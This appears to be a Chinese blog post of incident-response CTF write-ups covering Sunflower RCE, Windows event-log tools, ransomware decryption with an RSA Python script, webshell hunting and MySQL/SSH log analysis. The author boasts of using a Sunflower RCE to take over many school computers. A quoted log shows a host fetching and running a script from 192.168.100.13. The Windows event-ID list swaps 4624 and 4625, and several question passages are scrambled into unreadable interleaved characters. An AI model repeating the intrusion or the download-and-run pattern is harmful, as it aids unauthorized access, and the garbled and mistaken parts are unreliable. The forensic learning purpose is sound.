应急响应

windows实战-向日葵 这题涉及软件漏洞，经过查询发现漏洞应该是CNVD-2022-03672 这个漏洞我用过，也是接触最早的rce漏洞，虽然没有深入研究但是曾经用它拿下过学校超级多的电脑XD 猜测简单来说这个漏洞是因为向日葵在安装后会在高端口开放一个接口，这个接口存在cookie泄漏与命令执行 通 通 通 找 找 过 过 过 到 到 本 本 本 黑 黑 地 地 地 客 客 解 解 P P P 密 密 C C C D D R R R E E D D D C C P P P 到 到 到 文 文 服 服 服 件 件 务 务 务 , , 器 器 器 将 将 并 并 并 黑 黑 且 且 且 客 客 找 找 找 D D 到 到 到 E E 黑 黑 黑 C C 客 客 客 首 攻 托 文 文 次 击 管 件 件 攻 的 恶 的 的 击 意 成 I 程 m m 功 P 序 d d 的 5 5 时 为 I 间 多 P 作 作 为 少 为 为 , 为 为 将 , F F 多 黑 将 L L 少 客 黑 A A , 攻 客 G G 将 击 托 黑 管 提 提 客 I 恶 交 交 首 P 意 ; ; 次 程 通 攻 作 序 过 击 为 本 成 I 地 功 F P 的 L P 时 A 作 C 间 G 为 为 R 提 F D 作 交 L P 为 ; A 到 G 服 F 务 L 提 器 A 交 并 G ; 且 解 提 密 交 黑 ( 客 2 勒 0 索 2 软 8 件 - , 0 将 3 桌 - 面 2 加 6 密 文 0 件 8 中 : 关 1 键 1 信 : 息 2 作 5 为 . 1 F 2 L 3 A ) G ; 提 交 ; 这题现在似乎有点问题，本来有5问的，但是最后两问做不出来，因为群加满了，二群又没有文件 ...

windows 工具化日志分析 windows的日志与linux不同，linux以文本形式存放于/var/log下，而windows的日志是专有格式evtx遂分析方式也不同于常见linux日志常见由Windows日志查看器Eventvwr开启，也有其他的第三方日志分析工具 windows日志分析重点是事件id，一般分析也围绕着这些id展开，常见id 4624 失败登入 4625 成功登入 4634/4647 成功注销 4648 凭证登入 4672 超级用户登入 4720 用户创建 7036 服务状态更改 APT-Hunter 类似一种格式转化器，使用方式 APT-Hunter.exe -p 文件地址 https://github.com/ahmedkhlief/APT-Hunter 用不惯，但是可以通过他先看到一些基础信息 WELA (Windows Event Log Analyzer) ゑ羅 个人觉得相当好用的一个日志查看器，是一个ps脚本，能将log解析后图形化输出 快速事件统计 ./WELA.ps1 -LogFile .\Security.evtx -SecurityEventID_Statistics .\WELA.ps1 -logfile C:\Users\Administrator\Desktop\log\安全.evtx -SecurityLogonTimeline -OutputGUI -UTC 拿做过的一道响应题举例，这里对攻击者ip与所使用的账户定位都变得非常方便 hayabusa 这个工具应该也是开发ゑ羅的开发者开发的，相比其更加强大

vulntarget-n 分析攻击事件是如何发生的，请给出攻击画像 解密勒索 恢复原来的index.jsp页面，恢复正常的web服务 找到隐藏在其中的3个flag 入侵事件，先备份命令历史 cat .bash_history >> bash_hi.bak 第一个flag flag{vulntarget_very_G00d} 但没够继续翻日志 跟踪log可以看到服务器这里是tomcat的服务端位于/opt/tomcat/root这里在备份index后又新建了一个，接着跟踪 在根目录创建了一个.vulntarget文件夹，用python生成了一对密钥对，然后拷贝了公钥到根目录用py脚本进行了加密，跟踪来到生成密钥的位置 可以看到私钥没有删除，根据log文件信息也只做了rsa,那只需要写一个脚本解密就好，然后截至到这里遇到了卡住我的第一个点 flag解密是正常的，但相对较长的index与404文件无法正常解密，后续是使用python解决的 import base64 import os import rsa # 定义目标后缀 TARGET_EXTENSIONS = ['.vulntarget'] def load_private_key(key_path): """加载RSA私钥""" with open(key_path, mode="rb") as file: priv_key = file.read() return rsa.PrivateKey.load_pkcs1(priv_key) def rsa_decrypt(file_name, priv_key): """对文件进行RSA解密""" with open(file_name, mode="rb") as file: encoded_data = file.read() try:xin xi data = base64.b64decode(encoded_data) except Exception as e: print(f"Base64 decode error for file {file_name}: {e}") return # 打印解密前的数据块信息 print(f"Decrypting file: {file_name}") print(f"Encoded data length: {len(encoded_data)}") print(f"Decoded data length: {len(data)}") # 存储解密后的数据块 res = [] # 设置每次解密的数据块大小为128字节 chunk_size = 128 # 128大小 关键flag{https://github.com/crow821/vulntarget} for i in range(0, len(data), chunk_size): chunk = data[i:i + chunk_size] print(f"Decrypting chunk {i // chunk_size}: {chunk.hex()[:60]}...") try: decrypted_chunk = rsa.decrypt(chunk, priv_key) res.append(decrypted_chunk) except rsa.pkcs1.DecryptionError as e: # 如果解密过程中出现错误，则打印错误信息并跳过当前数据块 print(f"Decryption failed for chunk {i // chunk_size}: {e}") continue # 跳过失败的块 decrypted_data = b''.join(res) os.remove(file_name) # 去掉后缀 new_file_name = file_name.replace(".vulntarget", "") with open(new_file_name, mode="wb") as file: file.write(decrypted_data) print(f"[+] Decrypt success: {new_file_name}") def decrypt_files_in_directory(directory_path, priv_key): """递归解密目录下的所有文件""" for root, _, files in os.walk(directory_path): for file in files: file_path = os.path.join(root, file) if any(file_path.endswith(ext) for ext in TARGET_EXTENSIONS): rsa_decrypt(file_path, priv_key) def main(target_path, key_path): """主函数""" priv_key = load_private_key(key_path) if os.path.isdir(target_path): decrypt_files_in_directory(target_path, priv_key) else: if any(target_path.endswith(ext) for ext in TARGET_EXTENSIONS): rsa_decrypt(target_path, priv_key) if __name__ == '__main__': target_path = './' # 替换为实际路径 key_path = './key.pem' # 替换为私钥路径 main(target_path, key_path) 使用了分块解密 ...

windows实战-emlog 基于xp面板的windows应急响应 找 分 分 分 到 析 析 析 黑 黑 黑 黑 客 客 客 客 植 攻 的 的 入 击 隐 挖 成 藏 矿 s 功 账 程 h 的 户 序 e 名 的 l I 称 矿 l P , 池 , 将 域 将 为 黑 名 黑 多 客 , 客 少 隐 将 植 , 藏 黑 入 将 账 客 黑 户 挖 s 客 名 矿 h 称 程 e I 作 序 l P 为 的 l 矿 作 F 池 的 为 L 域 密 A 名 码 F G 称 L 作 作 A 提 为 为 G 交 ( ; 仅 F 提 域 L 交 名 A ; ) G F L 提 A 交 G ; 提 交 ; 找到黑客植入 shell,将黑客植入 shell 的密码 作为 FLAG 提交; 登入服务器，可以看到xp面板，打开xp面板可以找到网站的根目录位于C:\phpstudy_pro\WWW\WWW ...

考的是对mysql下渗透方式的熟悉程度 1.黑客第一次写入的shell flag{关键字符串} 2.黑客反弹shell的ip flag{ip} 3.黑客提权文件的完整路径 md5 flag{md5} 注 /xxx/xxx/xxx/xxx/xxx.xx 4.黑客获取的权限 flag{whoami后的值} 黑客反弹shell的ip mysql的渗透我能想到的方法无非是注入，和弱口令接管，先找到日志 root@xuanji:~# find / -name mysql /etc/init.d/mysql /etc/mysql /usr/bin/mysql /usr/lib/perl5/auto/DBD/mysql /usr/lib/perl5/DBD/mysql /usr/lib/mysql /usr/share/mysql /usr/share/php5/mysql /var/lib/mysql /var/lib/mysql/mysql /var/lib/php5/modules/apache2/enabled_by_maint/mysql /var/lib/php5/modules/cli/enabled_by_maint/mysql /var/lib/php5/modules/registry/mysql /var/log/mysql cat以后值得注意的内容是 sh: 1: curl: not found --2023-08-01 02:14:11-- http://192.168.100.13:771/ Connecting to 192.168.100.13:771... connected. HTTP request sent, awaiting response... 200 No headers, assuming HTTP/0.9 Length: unspecified Saving to: 'index.html' 0K 2.46 =2.0s 2023-08-01 02:14:13 (2.46 B/s) - 'index.html' saved [5] /tmp/1.sh: line 1: --2023-08-01: command not found /tmp/1.sh: line 2: Connecting: command not found /tmp/1.sh: line 3: HTTP: command not found /tmp/1.sh: line 4: Length:: command not found /tmp/1.sh: line 5: Saving: command not found /tmp/1.sh: line 7: 0K: command not found /tmp/1.sh: line 9: syntax error near unexpected token `(' /tmp/1.sh: line 9: `2023-08-01 02:16:35 (5.01 MB/s) - '1.sh' saved [43/43]' 服务器从192.168.100.13下载了一个脚本并运行了cat一下脚本 ...

1 2 3 4 5 . . . . . w 服 不 黑 黑 e 务 死 客 客 b 器 马 留 留 目 疑 是 下 下 录 似 通 了 了 存 存 过 木 木 在 在 哪 马 马 木 不 个 文 文 马 死 文 件 件 ， 马 件 ， ， 请 ， 生 请 请 找 请 成 找 找 到 找 的 出 出 木 到 ， 黑 黑 马 不 请 客 客 的 死 提 的 服 密 马 交 服 务 码 的 文 务 器 提 密 件 器 开 交 码 名 i 启 提 p 的 交 提 监 交 端 口 提 交 查找文件目录可以通过find / -name www来找 ...

入门日志分析 1 2 3 4 5 . . . . . 有 s 爆 登 黑 多 s 破 陆 客 少 h 用 成 登 I 爆 户 功 陆 P 破 名 的 主 在 成 字 I 机 爆 功 典 P 后 破 登 是 共 新 主 陆 什 爆 建 机 的 么 破 了 s I ？ 了 一 s P 如 多 个 h 是 果 少 后 的 多 有 次 门 r 少 多 用 o ， 个 户 o 如 使 ， t 果 用 用 帐 有 " 户 号 多 , 名 ， 个 " 是 如 使 分 多 果 用 割 少 有 " 多 , 个 " 使 分 用 割 " , " 分 割 有多少IP在爆破主机ssh的root帐号 在linux中登入日志为 ...